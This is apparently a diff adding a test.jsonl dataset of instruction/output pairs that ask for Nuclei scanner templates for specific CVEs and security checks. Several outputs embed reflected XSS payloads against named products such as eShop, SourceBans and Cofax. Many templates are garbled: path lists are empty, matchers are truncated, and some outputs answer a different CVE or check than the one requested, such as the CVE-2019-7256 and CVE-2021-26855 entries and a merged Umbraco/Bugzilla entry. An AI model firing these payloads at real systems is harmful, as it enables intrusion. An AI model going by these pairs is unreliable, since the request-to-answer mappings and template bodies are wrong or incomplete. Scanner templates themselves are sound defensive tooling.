diff --git "a/test.jsonl" "b/test.jsonl"
new file mode 100644--- /dev/null
+++ "b/test.jsonl"
@@ -0,0 +1,1675 @@
+{"instruction": "Generate a Nuclei template for CVE-2022-35493", "input": "Title: Cross-Site Scripting (XSS) in wrteam eshop_-_ecommerce_\\/_store_website\nSummary: A Cross-site scripting (XSS) vulnerability in json search parse and the json response in wrteam.in, eShop - Multipurpose Ecommerce Store Website version 3.0.4 allows remote attackers to inject arbitrary web script or HTML via the get_products?search parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: wrteam eshop_-_ecommerce_\\/_store_website\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-35493\n\ninfo:\n name: eShop 3.0.4 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.\n tags: cve,cve2022,eshop,xss,wrteam,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E\" \n matchers:\n - type: word\n words:\n - \"Search Result for \\\">\" \n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-35493"}
+{"instruction": "Generate a Nuclei template for CVE-2022-4325", "input": "Title: Unknown Vulnerability in ifeelweb post_status_notifier_lite\nSummary: The Post Status Notifier Lite WordPress plugin before 1.10.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: ifeelweb post_status_notifier_lite\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4325\n\ninfo:\n name: WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-4325"}
+{"instruction": "Generate a Nuclei template for: PostgreSQL \"log_disconnections\" Parameter - Disabled", "input": "Title: PostgreSQL \"log_disconnections\" Parameter - Disabled\nSummary: PostgreSQL \"log_disconnections\" Parameter - Disabled. The log_disconnections parameter in Alibaba Cloud RDS for PostgreSQL is disabled, meaning the database does not log session disconnections. This can hinder the ability to audit and analyze database connection activities effectively.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: log-disconnections-disabled\n\ninfo:\n name: PostgreSQL \"log_disconnections\" Parameter - Disabled\n author: DhiyaneshDK\n severity: medium\n description: The log_disconnections parameter in Alibaba Cloud RDS for PostgreSQL is disabled, meaning the database does not log session disconnections. This can hinder the ability to audit and analyze database connection activities effectively.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config,alibaba-rds\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "log-disconnections-disabled"}
+{"instruction": "Generate a Nuclei template for: Optimizely API Test", "input": "Title: Optimizely API Test\nSummary: Optimizely API Test. Tags: token-spray, optimizely\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-optimizely\n\ninfo:\n name: Optimizely API Test\n author: dwisiswant0\n severity: info\n description: Optimizely API Test\n tags: token-spray,optimizely\n\nhttp:\n - method: GET\n path:\n - \"https://api.optimizely.com/v2/projects\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"account_id\":\" \n - \"\"confidence_threshold\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-optimizely"}
+{"instruction": "Generate a Nuclei template for CVE-2022-25497", "input": "Title: Vulnerability (CWE-552) in cuppacms cuppacms\nSummary: CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\nVulnerability Type: Vulnerability (CWE-552)\nSeverity: medium\nAffected Products: cuppacms cuppacms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-25497\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: medium\n description: CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\n tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"text/plain\" \n part: header_2\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-25497"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: teknik\n\ninfo:\n name: Teknik User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Teknik user name information check was conducted.\n tags: osint,osint-tech,teknik,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://user.teknik.io/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Public Key\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2015-8349", "input": "Title: Cross-Site Scripting (XSS) in gameconnect sourcebans\nSummary: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: gameconnect sourcebans\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-8349\n\ninfo:\n name: SourceBans <2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.\n tags: cve2015,cve,xss,sourcebans,gameconnect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2015-8349"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - DigitalOcean Anchor", "input": "Title: Content-Security-Policy Bypass - DigitalOcean Anchor\nSummary: Content-Security-Policy Bypass - DigitalOcean Anchor\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: digitalocean-anchor-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - DigitalOcean Anchor\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - DigitalOcean Anchor\n tags: xss,csp-bypass,digitalocean-anchor,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"digitalocean.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "digitalocean-anchor-csp-bypass"}
+{"instruction": "Generate a Nuclei template for CVE-2021-45811", "input": "Title: SQL Injection in enhancesoft osticket\nSummary: A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\nVulnerability Type: SQL Injection\nSeverity: medium\nAffected Products: enhancesoft osticket\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-45811\n\ninfo:\n name: osTicket 1.15.x - SQL Injection\n author: ritikchaddha\n severity: medium\n description: A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\n tags: cve,cve2021,osticket,sqli,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "medium", "id": "CVE-2021-45811"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mastodon-mstdnio\n\ninfo:\n name: Mastodon-mstdn.io User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Mastodon-mstdn.io user name information check was conducted.\n tags: osint,osint-social,mastodon-mstdnio,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://mstdn.io/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"@mstdn.io) - Mastodon\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2024-46310", "input": "Title: Vulnerability (CWE-281) in CVE-2024-46310\nSummary: Incorrect Access Control in Cfx.re FXServer v9601 and earlier allows unauthenticated users to modify and read arbitrary user data via exposed API endpoint\nVulnerability Type: Vulnerability (CWE-281)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-46310\n\ninfo:\n name: FXServer < v9601 - Information Exposure\n author: s4e-io\n severity: medium\n description: Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.\n tags: cve,cve2024,fxserver,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-46310"}
+{"instruction": "Generate a Nuclei template for: Invoice Ninja Setup Page - Exposure", "input": "Title: Invoice Ninja Setup Page - Exposure\nSummary: Invoice Ninja Setup Page - Exposure. Detects exposed Invoice Ninja Setup page.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: invoice-ninja-installer\n\ninfo:\n name: Invoice Ninja Setup Page - Exposure\n author: DhiyaneshDK\n severity: high\n description: Detects exposed Invoice Ninja Setup page.\n tags: misconfig,install,exposure,invoice,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup\" \n matchers:\n - type: word\n words:\n - \"Invoice Ninja Setup\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "invoice-ninja-installer"}
+{"instruction": "Generate a Nuclei template for: Weaver OA XmlRpcServlet - Arbitary File Read", "input": "Title: Weaver OA XmlRpcServlet - Arbitary File Read\nSummary: Weaver OA XmlRpcServlet - Arbitary File Read. e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: CNVD-2022-43245\n\ninfo:\n name: Weaver OA XmlRpcServlet - Arbitary File Read\n author: SleepingBag945\n severity: high\n description: e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.\n tags: cnvd,cnvd2022,weaver,e-office,oa,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/xml\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "CNVD-2022-43245"}
+{"instruction": "Generate a Nuclei template for CVE-2005-4385", "input": "Title: Unknown Vulnerability in cofax cofax\nSummary: Cross-site scripting (XSS) vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: cofax cofax\nIndicators: error, vulnerability detected", "output": "id: CVE-2005-4385\n\ninfo:\n name: Cofax <=2.0RC3 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.\n tags: cve2005,cve,cofax,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"'>\"\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2005-4385"}
+{"instruction": "Generate a Nuclei template for: Seeyon OA A6 config.jsp - Information Disclosure", "input": "Title: Seeyon OA A6 config.jsp - Information Disclosure\nSummary: Seeyon OA A6 config.jsp - Information Disclosure. The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: seeyon-config-exposure\n\ninfo:\n name: Seeyon OA A6 config.jsp - Information Disclosure\n author: SleepingBag945\n severity: medium\n description: The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server\n tags: seeyon,oa,config,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"DatabaseName=\" \n - \"\u8bf7\u5728\u6587\u672c\u6846\u5185\u914d\u7f6e\u4f20\u771f\u63d2\u4ef6\u6240\u9700\u670d\u52a1\u5668\u7684\u4fe1\u606f\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "seeyon-config-exposure"}
+{"instruction": "Generate a Nuclei template for CVE-2022-2633", "input": "Title: Vulnerability (CWE-610) in plugins360 all-in-one_video_gallery\nSummary: The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file downloads and blind server-side request forgery via the 'dl' parameter found in the ~/public/video.php file in versions up to, and including 2.6.0. This makes it possible for unauthenticated users to download sensitive files hosted on the affected server and forge requests to the server.\nVulnerability Type: Vulnerability (CWE-610)\nSeverity: high\nAffected Products: plugins360 all-in-one_video_gallery\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2633\n\ninfo:\n name: All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Interactsh Server\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-2633"}
+{"instruction": "Generate a Nuclei template for: Microsoft IIS version detect", "input": "Title: Microsoft IIS version detect\nSummary: Microsoft IIS version detect. Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: microsoft-iis-version\n\ninfo:\n name: Microsoft IIS version detect\n author: Wlayzz\n severity: info\n description: Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\n tags: tech,microsoft,iis,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"IIS\" \n part: header", "category": "generic", "severity": "info", "id": "microsoft-iis-version"}
+{"instruction": "Generate a Nuclei template for CVE-2019-7256", "input": "Title: OS Command Injection in nortekcontrol linear_emerge_essential_firmware and others\nSummary: Linear eMerge E3-Series devices allow Command Injections.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: nortekcontrol linear_emerge_essential_firmware, nortekcontrol linear_emerge_elite_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-31499\n\ninfo:\n name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection\n author: pikpikcu\n severity: critical\n description: Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.\n tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2019-7256"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mylittleadmin-panel\n\ninfo:\n name: myLittleAdmin Login Panel - Detect\n author: nullfuzz\n severity: info\n description: myLittleAdmin login panel was detected.\n tags: panel,mylittleadmin,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/mylittleadmin/\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2020-36155", "input": "Title: Vulnerability (CWE-269) in ultimatemember ultimate_member\nSummary: An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Meta. An attacker could supply an array parameter for sensitive metadata, such as the wp_capabilities user meta that defines a user's role. During the registration process, submitted registration details were passed to the update_profile function, and any metadata was accepted, e.g., wp_capabilities[administrator] for Administrator access.\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: critical\nAffected Products: ultimatemember ultimate_member\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-36155\n\ninfo:\n name: Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta\n author: riteshs4hu\n severity: critical\n description: An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Meta. An attacker could supply an array parameter for sensitive metadata, such as the wp_capabilities user meta that defines a user's role. During the registration process, submitted registration details were passed to the update_profile function, and any metadata was accepted, e.g., wp_capabilities[administrator] for Administrator access.\n tags: cve,cve2020,wordpress,wp-plugin,wp,wpscan,ultimate-member,intrusive,privesc,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2020-36155"}
+{"instruction": "Generate a Nuclei template for: RDS Copy Tags to Snapshots - Disabled", "input": "Title: RDS Copy Tags to Snapshots - Disabled\nSummary: RDS Copy Tags to Snapshots - Disabled. Ensure that your Amazon RDS database instances make use of the Copy Tags to Snapshots feature in order to allow tags set on your database instances to be automatically copied to any automated or manual database snapshots that are created from these RDS instances.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: rds-copy-snap\n\ninfo:\n name: RDS Copy Tags to Snapshots - Disabled\n author: DhiyaneshDK\n severity: low\n description: Ensure that your Amazon RDS database instances make use of the Copy Tags to Snapshots feature in order to allow tags set on your database instances to be automatically copied to any automated or manual database snapshots that are created from these RDS instances.\n tags: cloud,devops,aws,amazon,rds,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "rds-copy-snap"}
+{"instruction": "Generate a Nuclei template for: Formalms Exposed Installation", "input": "Title: Formalms Exposed Installation\nSummary: Formalms Exposed Installation. Formalms Installation is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: formalms-install\n\ninfo:\n name: Formalms Exposed Installation\n author: princechaddha\n severity: high\n description: Formalms Installation is exposed.\n tags: misconfig,formalms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/\" \n matchers:\n - type: word\n words:\n - \"forma.lms installer\" \n - \"
forma.lms - Installation
\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "formalms-install"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: umbraco-login\n\ninfo:\n name: Umbraco Login Panel - Detect\n author: ola456,stvnhrlnd\n severity: info\n description: Umbraco login panel was detected.\n tags: panel,umbraco,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/umbraco\" \n - \"{{BaseURL}}/umbraco/login\" \n matchers:\n - type: word\n words:\n - \"Umbraco.Sys\" \n - \"Bugzilla Main\" \n - \"title=\"Bugzilla\" \n - \"href=\"https://bugzilla.readthedocs.org/\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "bugzilla-detect"}
+{"instruction": "Generate a Nuclei template for: YzmCMS - Installer", "input": "Title: YzmCMS - Installer\nSummary: YzmCMS - Installer. YzmCMS is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: yzmcms-installer\n\ninfo:\n name: YzmCMS - Installer\n author: ritikchaddha\n severity: high\n description: YzmCMS is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,yzmcms,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/application/install/index.php\" \n matchers:\n - type: word\n words:\n - \"\u5b89\u88c5\u7a0b\u5e8f - YzmCMS\" \n - \"YzmCMS\" \n part: body\n condition: or\n - type: word\n words:\n - \"/index.php?step=2\" \n - \"/install.css\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "yzmcms-installer"}
+{"instruction": "Generate a Nuclei template for: gawk - Privilege Escalation", "input": "Title: gawk - Privilege Escalation\nSummary: gawk - Privilege Escalation. gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-gawk\n\ninfo:\n name: gawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.\n tags: code,linux,gawk,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-gawk"}
+{"instruction": "Generate a Nuclei template for CVE-2021-26855", "input": "Title: Vulnerability (CWE-918) in microsoft exchange_server\nSummary: Microsoft Exchange Server Remote Code Execution Vulnerability\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: microsoft exchange_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-33766\n\ninfo:\n name: Microsoft Exchange - Authentication Bypass\n author: daffainfo\n severity: high\n description: Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.\n tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"403\" \n - \"function signOut() {\" \n part: body\n condition: and\n - type: word\n words:\n - \"Microsoft.Exchange.Data.Storage.ObjectNotFoundException\" \n - \"X-BEResource=\" \n part: header\n condition: and\n - type: status\n status:\n - 403", "category": "cve", "severity": "critical", "id": "CVE-2021-26855"}
+{"instruction": "Generate a Nuclei template for: FineReport Security Checks", "input": "Title: FineReport Security Checks\nSummary: FineReport Security Checks. A simple workflow that runs all FineReport related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: finereport-workflow\n\ninfo:\n name: FineReport Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all FineReport related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "finereport-workflow"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: quitterpl\n\ninfo:\n name: Quitter.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Quitter.pl user name information check was conducted.\n tags: osint,osint-social,quitterpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://quitter.pl/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"@quitter.pl\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: EOS HTTP Browser", "input": "Title: EOS HTTP Browser\nSummary: EOS HTTP Browser. Tags: exposure, eos, httpbrowser\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: eos-http-browser\n\ninfo:\n name: EOS HTTP Browser\n author: DhiyaneshDk\n severity: medium\n description: EOS HTTP Browser\n tags: exposure,eos,httpbrowser,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/eos/\" \n matchers:\n - type: word\n words:\n - \"STAT TEST\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "eos-http-browser"}
+{"instruction": "Generate a Nuclei template for: Dependency-Track Login - Panel", "input": "Title: Dependency-Track Login - Panel\nSummary: Dependency-Track Login - Panel. Dependency Track login panel was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dependency-track-panel\n\ninfo:\n name: Dependency-Track Login - Panel\n author: Th3l0newolf\n severity: info\n description: Dependency Track login panel was discovered.\n tags: panel,login,dependency,track,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redirect=%2Fdashboard\" \n matchers:\n - type: word\n words:\n - \"Dependency-Track\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "dependency-track-panel"}
+{"instruction": "Generate a Nuclei template for CVE-2022-47075", "input": "Title: Unknown Vulnerability in smartofficepayroll smartoffice\nSummary: An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: smartofficepayroll smartoffice\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-47075\n\ninfo:\n name: Smart Office Web 20.28 - Information Disclosure\n author: r3Y3r53\n severity: high\n description: An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\n tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ExportReportingManager.aspx\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2022-47075"}
